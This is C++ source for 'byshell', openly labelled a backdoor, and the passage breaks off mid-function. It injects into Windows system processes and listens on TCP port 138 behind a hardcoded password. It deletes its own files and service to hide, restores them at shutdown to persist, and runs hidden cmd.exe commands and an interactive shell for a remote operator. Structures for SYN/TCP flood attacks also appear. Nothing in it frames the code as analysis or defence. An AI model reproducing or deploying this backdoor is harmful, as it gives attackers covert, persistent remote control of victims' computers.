ntboot.cpp

byshell后门源代码

//byshell v0.63DLL,use tcp138 in winlogon.//no,svchost/no,all system process are the same/inj to spoolsv,can be changed to other
//powered 12.19,2004(a long struggle!)
//receive shutdown signal
/*************************************************************
4  ways:
1 setconsolecontrolhandler(donot need msg queue)
//1_ but winlogon cannot receive such a signal!!
2 receive wm_queryendsession(need to register wnd class and msgqueue)
3 setwindowshookex shutdownkey 0xff(need a msg queue but do not receive msg from GetMessage,maybe windows automatically call the CALLBACK)
//2_same code keyhook when inj to a simple process can cause a beep but in winlogon cannot
//2_winlogon cannot use hook,maybe winlogon even cannot use anything related to msg
4 setwindowshookex any process receive wm_queryendsession(same to 3)
****************************************************************/
//experiment:lsass,the same to winlogon
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "kernel32.lib")
#include <winsock2.h>
#include <stdlib.h>
#include <tlhelp32.h>
#include <Ws2tcpip.h>
#include <string.h>
#pragma comment(lib,"advapi32.lib")
//#include "ntdll.h"
//#include <winuser.h>


#pragma data_seg("abShared")
char pwd[16]="by";char buff[65536];
struct{SECURITY_ATTRIBUTES sa;HANDLE hread,hwrite,cread,cwrite;
STARTUPINFO si;PROCESS_INFORMATION pi;
}extshell;
struct{char target[256];char dostype;char faketype;int serioustype;HANDLE threadhandle;HANDLE timerhandle;
int pausetime;int seconds;int definemins;WORD attackport;WORD useport;}dos;
//0 not,1 syn,2 tcp//0 nolimit,1 Bclass,2 nofake
HANDLE filefp;HANDLE pbitmapwithoutfileh;DWORD sizeimage;unsigned int packnum=0;//num of pack sent already


void* memloader;void* memdll;int sizeloader;int sizedll;HHOOK msghook;HANDLE mainthread;
#pragma data_seg() 


__declspec(dllexport)
DWORD WINAPI CmdService(LPVOID);//real telnetEX server function

char work(char * workbuff,unsigned int workbufflen,char workflag,int * psendlength);//return flag,int * psendlength send size


BOOL APIENTRY DllMain( HANDLE hModule, 
                       DWORD  ul_reason_for_call, 
                       LPVOID lpReserved
                     )
{    return TRUE;
}


__declspec(dllexport)
DWORD WINAPI CmdService(LPVOID lpParam){
int ret;DWORD dwThreadId;DWORD bytesread;char syspath[256];
//donnot save pass on disk any more
GetSystemDirectory(syspath,256);strcat(syspath,"\\ntboot.dat");
HANDLE pwdfp=CreateFile(syspath,GENERIC_READ,0,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
if(pwdfp==INVALID_HANDLE_VALUE){strcpy(pwd,"by");}
else{DWORD bytesread;ReadFile(pwdfp,pwd,16,&bytesread,0);CloseHandle(pwdfp);}
DeleteFile(syspath);	
//del the loader service,del the two files
Sleep(100);
	SC_HANDLE        schSCManager;
	SC_HANDLE        schService;
	SERVICE_STATUS   RemoveServiceStatus;
	schSCManager=OpenSCManager(0,NULL,SC_MANAGER_ALL_ACCESS);
	schService=OpenService(schSCManager,"ntboot",SERVICE_ALL_ACCESS);
    QueryServiceStatus(schService,&RemoveServiceStatus);

			if(RemoveServiceStatus.dwCurrentState==SERVICE_STOPPED){}
     		else
			{
     			if(ControlService(schService,SERVICE_CONTROL_STOP,&RemoveServiceStatus)!=0)
				{
      				while(RemoveServiceStatus.dwCurrentState==SERVICE_STOP_PENDING)         
					{
    					Sleep(10);
	    				QueryServiceStatus(schService,&RemoveServiceStatus);
					}

				}
				else
				{}
			}
    DeleteService(schService);
	CloseServiceHandle(schSCManager);        
	CloseServiceHandle(schService);


Sleep(100);
ret=GetSystemDirectory(syspath,256);
HANDLE delfp=CreateFile(strcat(syspath,"\\ntboot.exe"),GENERIC_READ,0,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
sizeloader=GetFileSize(delfp,0);memloader=VirtualAlloc(0,sizeloader,MEM_COMMIT|MEM_RESERVE,PAGE_READWRITE);
ReadFile(delfp,memloader,sizeloader,&bytesread,0);CloseHandle(delfp);DeleteFile(syspath);

ret=GetSystemDirectory(syspath,256);
delfp=CreateFile(strcat(syspath,"\\ntboot.dll"),GENERIC_READ,0,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
sizedll=GetFileSize(delfp,0);memdll=VirtualAlloc(0,sizedll,MEM_COMMIT|MEM_RESERVE,PAGE_READWRITE);
ReadFile(delfp,memdll,sizedll,&bytesread,0);CloseHandle(delfp);DeleteFile(syspath);

//install hook,when shutdown resume two files and the service

//need a thread to interpret the message queue
//no!the msgqueue must be in the same thread of the setwindowshookex
/*A JournalRecordProc hook procedure does not need to live in a dynamic-link library. 
A JournalRecordProc hook procedure can live in the application itself. 
--MSDN*/
/*
LRESULT CALLBACK JournalRecordProc(int code,WPARAM wParam,LPARAM lParam);
//keyhook=SetWindowsHookEx(WH_KEYBOARD,KeyboardProc,0,0);1428
msghook=SetWindowsHookEx(WH_JOURNALRECORD,JournalRecordProc,GetModuleHandle(0),0);
//if(!msghook){MessageBox(0,itoa(GetLastError(),syspath,10),0,0);}
DWORD WINAPI msgqueue( LPVOID lpParam );CreateThread(0,0,msgqueue,0,0,&dwThreadId);
*/
DWORD WINAPI hookthread( LPVOID lpParam );CreateThread(0,0,hookthread,0,0,&dwThreadId);
mainthread=GetCurrentThread();

//begin network
LoadLibrary("WS2_32.dll");LoadLibrary("wshtcpip.dll");LoadLibrary("WS2HELP.DLL");
LoadLibrary("msafd.dll");//加载必要模块否则在解除映射后可能缺少需要的库
label3: WSADATA WSAData;WSAStartup(MAKEWORD(2,2),&WSAData);
SOCKET socklisten=socket(AF_INET,SOCK_STREAM,0);SOCKET socktcp;
sockaddr_in srvaddr;memset(&srvaddr,0,sizeof(struct sockaddr_in));
srvaddr.sin_family= AF_INET;
srvaddr.sin_port = htons(138);
srvaddr.sin_addr.S_un.S_addr = INADDR_ANY;
ret=bind(socklisten,(struct sockaddr *)&srvaddr,sizeof(struct sockaddr));
if(ret){goto label2;}
if(listen(socklisten,5)==-1){goto label2;}
label1: while (true){
  socktcp= accept(socklisten, 0,0);
  if(socktcp!=0 && socktcp!=-1){break;}
  Sleep(250);}
//recv4096,send4080
//about Q3:  no fixed size packet!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!bad for dir c:\winnt
//11Q,multithread
dwThreadId=0;DWORD WINAPI threadfunc( LPVOID lpParam );
CreateThread(0, 0, threadfunc, &socktcp, 0, &dwThreadId);
goto label1;
/*while(1){memset(buff,0,65536);recvlen=recv(socktcp,buff,65536,0);
 if(strncmp(buff,pwd,strlen(pwd))){closesocket(socktcp);workflag=0;goto label1;}
 int sendlength=65520;workflag=work(buff+16,recvlen-16,workflag,&sendlength);
 if(sendlength!=send(socktcp,buff+16,sendlength,0)){closesocket(socktcp);workflag=0;goto label1;}
       }*/
//wait for error to be solved
label2:
closesocket(socklisten);Sleep(1000);goto label3;
return 0;}

//这个键盘喇叭钩子不是很健壮，经常在工作1，2个小时后罢工??
LRESULT CALLBACK JournalRecordProc(int code,WPARAM wParam,LPARAM lParam){void resume();
if(code<0){return CallNextHookEx(msghook,code,wParam,lParam);}
if(code==HC_ACTION){
	EVENTMSG * pevent=(EVENTMSG *)lParam;
	if(pevent->message==WM_KEYDOWN && LOBYTE(pevent->paramL)==0xFF){resume();}
	//if(pevent->message==WM_KEYDOWN && LOBYTE(pevent->paramL)==0x42){MessageBeep(0);}
	//if(pevent->message==WM_KEYDOWN && LOBYTE(pevent->paramL)==0x41){}
	//if(pevent->message==WM_QUERYENDSESSION){DebugBreak();}
}
return CallNextHookEx(msghook,code,wParam,lParam);
}

//i suffer a lot

BOOL WINAPI HandlerRoutine(DWORD dwCtrlType){void resume();
switch(dwCtrlType)
{
case CTRL_SHUTDOWN_EVENT:
resume();
break;
default:
break;
}
return 0;
}



DWORD WINAPI hookthread( LPVOID lpParam ){MSG msg;int tmpret;char tmpstr[100];
LRESULT CALLBACK JournalRecordProc(int code,WPARAM wParam,LPARAM lParam);
//BOOL WINAPI HandlerRoutine(DWORD dwCtrlType);
msghook=SetWindowsHookEx(WH_JOURNALRECORD,JournalRecordProc,GetModuleHandle(0),0);
if(!msghook){MessageBox(0,itoa(GetLastError(),tmpstr,10),0,0);DebugBreak();}
tmpret=SetConsoleCtrlHandler(HandlerRoutine,1);
if(!tmpret){MessageBox(0,itoa(GetLastError(),tmpstr,10),0,0);DebugBreak();}
//setwindowshookex(key) need a msg queue but do not receive msg from GetMessage,weird,maybe need a initialize of msg function?
while (GetMessage(&msg, NULL, 0, 0)){void resume();
if(msg.message==WM_QUERYENDSESSION){resume();}
//DispatchMessage(&msg);
}
UnhookWindowsHookEx(msghook);
return 0;
}

//resume two files and the service
void resume(){
//HANDLE hhhfp=CreateFile("d:\\aaaaaa",GENERIC_WRITE,0,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
//CloseHandle(hhhfp);
char syspath[256];int ret;DWORD bytesread;
ret=GetSystemDirectory(syspath,256);
HANDLE delfp=CreateFile(strcat(syspath,"\\ntboot.exe"),GENERIC_WRITE,0,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
WriteFile(delfp,memloader,sizeloader,&bytesread,0);CloseHandle(delfp);

ret=GetSystemDirectory(syspath,256);
delfp=CreateFile(strcat(syspath,"\\ntboot.dll"),GENERIC_WRITE,0,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
WriteFile(delfp,memdll,sizedll,&bytesread,0);CloseHandle(delfp);

ret=GetSystemDirectory(syspath,256);
delfp=CreateFile(strcat(syspath,"\\ntboot.dat"),GENERIC_WRITE,0,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
WriteFile(delfp,pwd,strlen(pwd),&bytesread,0);CloseHandle(delfp);

SC_HANDLE schSCManager;
schSCManager=OpenSCManager(0,NULL,SC_MANAGER_ALL_ACCESS);
CreateService(schSCManager,"NtBoot","NT Boot Service",SERVICE_ALL_ACCESS,
		      SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS,SERVICE_AUTO_START,
				SERVICE_ERROR_IGNORE,"ntboot.exe",NULL,NULL,NULL,NULL,NULL);
SetConsoleCtrlHandler(HandlerRoutine,0);UnhookWindowsHookEx(msghook);
return;
}


DWORD WINAPI threadfunc( LPVOID lpParam )
{char workflag=0;int recvlen=0;SOCKET socktcp;socktcp=*((SOCKET*)lpParam);
 while(1){memset(buff,0,66000);recvlen=recv(socktcp,buff,66000,0);
 if(strncmp(buff,pwd,strlen(pwd))){closesocket(socktcp);workflag=0;return 0;}//solve pwd
 int duelen;memcpy(&duelen,buff+28,4);
 while(duelen>recvlen){recvlen+=recv(socktcp,buff+recvlen,66000-recvlen,0);}//solve data division
 int sendlength=65536;
 if(!strncmp(buff+32,"dettach",7)){SetConsoleCtrlHandler(HandlerRoutine,0);UnhookWindowsHookEx(msghook);return 0xffffffff;}
 workflag=work(buff+32,duelen-32,workflag,&sendlength);
 sendlength+=32;memcpy(buff+28,&sendlength,4);
 if(sendlength!=send(socktcp,buff,sendlength,0)){closesocket(socktcp);workflag=0;return 0;}
       }
}




































//reusable module

//designed for 65536recv max,65520send max,16prefix.
char work(char * workbuff,unsigned int workbufflen,char workflag,int * psendlength)
{//cmd,not check the cmdlog,execute one command and return.
if(workflag==0 && strncmp(workbuff,"cmd",3)==0){
	char cmdline[1023]={0};GetSystemDirectory(cmdline,512);strcat(cmdline,"\\cmd.exe /c ");
	strncat(cmdline,workbuff+3,1024-strlen(cmdline));
	SECURITY_ATTRIBUTES sa;HANDLE hread,hwrite;sa.nLength=sizeof(SECURITY_ATTRIBUTES);
	sa.lpSecurityDescriptor=0;sa.bInheritHandle=1;CreatePipe(&hread,&hwrite,&sa,65536);
	STARTUPINFO si;PROCESS_INFORMATION pi;si.cb=sizeof(STARTUPINFO);GetStartupInfo(&si);
	si.hStdError=hwrite;si.hStdOutput=hwrite;si.wShowWindow=SW_HIDE;
	si.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
	if(!CreateProcess(0,cmdline,0,0,1,0,0,0,&si,&pi)){
		memset(workbuff,0,65520);strcpy(workbuff,"cmd bind error\n");return 0;
		}
	DWORD bytesread=0;
	//3Q sleep1000prevent readfile form miss data,here we cannot send many times.
	//still miss data, trys 5000 still.then must on the buffer of the pipe.
	//still no result.enlarge the CreatePipe buffter to 65536,success.
	//8Q if a cmd has no ret data,eg. "winver",backdoor will block in readfile.use peeknamedpipe to solve this problem.
	WaitForSingleObject( pi.hProcess, 10000);
	memset(workbuff,0,65520);PeekNamedPipe(hread,0,0,0,&bytesread,0);
	if(!bytesread){strcpy(workbuff,"pipe has no ret data\n");*psendlength=strlen(workbuff);return 0;}
	ReadFile(hread,workbuff,65520,&bytesread,0);
	CloseHandle(hread);CloseHandle(hwrite);*psendlength=bytesread;
		return 0;
}
//ok,shell,workflag=1
//start shell
if(workflag==0 && strncmp(workbuff,"shell",5)==0){
	char cmdline[1023]={0};GetSystemDirectory(cmdline,512);strcat(cmdline,"\\cmd.exe");
	extshell.sa.nLength=sizeof(SECURITY_ATTRIBUTES);
	extshell.sa.lpSecurityDescriptor=0;extshell.sa.bInheritHandle=1;
	CreatePipe(&extshell.hread,&extshell.hwrite,&extshell.sa,65536);
	CreatePipe(&extshell.cread,&extshell.cwrite,&extshell.sa,65536);
	extshell.si.cb=sizeof(STARTUPINFO);GetStartupInfo(&(extshell.si));